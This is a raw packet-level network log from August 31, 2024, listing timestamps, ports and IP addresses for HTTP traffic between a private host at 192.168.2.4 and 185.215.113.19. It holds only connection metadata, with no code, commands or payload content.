Aug 31, 2024 22:41:57.484683990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484683990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484700918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484721899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484781027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484797955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484822035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484843016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484863043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484879971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485025883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485047102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485064983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485086918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485099077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485126019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485143900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485163927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485188007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485199928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485222101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485236883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485260010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485280037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485305071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485323906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485708952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485761881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485779047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485800982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.485984087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486005068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486028910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486174107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486191988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486213923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486232996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486253023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486263990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486285925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486306906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486327887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486347914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486366034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486383915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486403942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486421108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486505032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486522913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486542940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486566067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486583948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486641884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486654043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486681938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486751080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486751080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486762047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486783981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486843109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486854076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486881018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486901999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486921072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486943007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.486953974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487092972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487107038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487138987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487159014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487171888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487194061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487215042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487227917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487253904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487276077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487296104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487312078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487386942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487406969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487428904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487451077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487525940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487525940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487546921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487566948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487617016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487637997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487656116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487714052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487729073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487752914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487771034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487790108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487809896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487936020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487961054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487978935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.487999916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488019943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488035917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488055944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488078117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488092899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488116026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488136053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488154888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488168001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488190889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488269091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488282919 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488310099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488320112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488342047 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488347054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488353968 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488360882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488364935 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488375902 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488387108 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488396883 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488408089 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488414049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488419056 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488435984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488436937 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488450050 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488460064 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488460064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488471031 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488487959 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488490105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488528013 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488540888 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488544941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488559961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488574982 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488584995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488586903 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488598108 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488609076 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488624096 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488635063 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488637924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488646030 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488656998 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488656998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488667965 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488679886 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488682032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488696098 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488698006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488707066 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488718033 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488718987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488729000 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488734007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488739967 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488750935 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488753080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488761902 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488773108 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488782883 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488794088 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488805056 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488816023 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488826036 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488836050 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488847017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488857031 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488867998 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488878012 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488883018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488889933 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488900900 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488904953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488910913 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488922119 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488929033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488931894 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488943100 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.488953114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488972902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.488989115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489003897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489027023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489039898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489061117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489075899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489095926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489116907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489132881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489216089 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.489365101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489375114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489402056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489424944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489437103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489490986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489506960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489531040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489583015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489609957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489619970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489645958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489665985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489685059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489820004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489841938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489866972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489890099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489908934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489928007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489945889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489967108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.489986897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490186930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490245104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490266085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490283966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490299940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490323067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490345955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490401983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490415096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490441084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490462065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490514994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490530014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490550041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490571976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490592957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490748882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490748882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490758896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490783930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490793943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490818024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490833044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490854025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490865946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490886927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490909100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490921974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490953922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490976095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.490988970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491060019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491080999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491097927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491107941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491163969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491184950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491204977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491218090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491266966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491481066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491740942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491879940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491906881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.491931915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492044926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492070913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492095947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492166996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492198944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492264986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492290020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492311954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492377996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492403030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492429972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492453098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492479086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492499113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492528915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492553949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492577076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492600918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492626905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492846966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492871046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492901087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492927074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492954969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.492979050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.493001938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.493022919 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493035078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.493035078 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493046045 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493057013 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493067980 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493078947 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493089914 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493100882 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493110895 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493122101 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493133068 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493143082 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493154049 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493164062 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493174076 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493185043 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493195057 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493206024 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493216038 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493227005 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493237972 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493272066 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493282080 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493293047 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493304014 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493319035 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493330002 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493340969 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493351936 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493362904 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493376970 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493386984 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493397951 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493415117 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493424892 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493436098 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493446112 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493457079 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493468046 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493478060 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493494987 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493505955 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493516922 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.493562937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.493635893 CEST	49732	80	192.168.2.4	185.215.113.19
